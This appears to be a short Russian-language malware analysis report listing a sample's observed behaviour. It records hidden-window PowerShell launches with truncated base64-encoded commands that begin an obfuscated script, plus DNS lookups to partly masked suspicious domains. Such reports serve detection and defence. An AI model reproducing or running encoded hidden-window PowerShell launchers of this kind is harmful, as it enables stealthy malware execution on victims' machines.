Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAHIAbwBhAHQAaQBhAG4AXwBLAHUAbgBhAGkAYQBkAD0AJwBEAGkAcwB0AHIAaQBiAHUAdABlAGQAcwBqAGYAJwA7ACQAcAB...
- DNS ASK go.###lonews.site
- DNS ASK ma#####rmarkonline.net
- DNS ASK ee######egicconsulting.com
- DNS ASK me####lade.com.ng
- DNS ASK fa##e.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAHIAbwBhAHQAaQBhAG4AXwBLAHUAbgBhAGkAYQBkAD0AJwBEAGkAcwB0AHIAaQBiAHUAdABlAGQAcwBqAGYAJwA7ACQAcAB...' (со скрытым окном)